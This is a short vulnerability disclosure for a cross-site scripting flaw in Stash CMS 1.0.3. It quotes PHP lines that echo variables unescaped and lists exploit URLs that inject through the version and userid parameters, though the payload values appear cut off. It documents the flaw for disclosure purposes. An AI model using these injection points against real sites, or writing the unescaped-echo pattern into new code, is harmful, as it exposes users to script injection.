Stash version 1.0.3 suffers from a cross site scripting vulnerability.
6ba8501e812e96d6fa6dd5cdeb22f3371b886d8676423502a55b21abbed66a4d
###################### Author: #############################
Author: Mr.SeCreT
E-mail: g-ff@hotmail.com<mailto:g-ff@hotmail.com>
From: Syria
http://english.islamweb.net/
############## Script Information: #########################
Script: Stash 1.0.3 Remote XSS Vulnerability
Language: PHP
Download: http://garr.dl.sourceforge.net/project/nice-stash/Stash%20CMS/1.0.3/stash-1.0.3.zip
################### Vul Code: ##############################
footer.inc.php:
<?php echo $version; ?>
<?php echo $userid ?>">My Info</a>
<title><?php echo $pagetitle ?></title>
header.inc.php:
<?php echo $user ?>
<?php echo $javascript ?>
<?php echo $sitename ?>
################### Exploit: ###############################
www.site.com/path/admin/footer.inc.php?version=
www.site.com/path/admin/footer.inc.php?userid=">
############################################################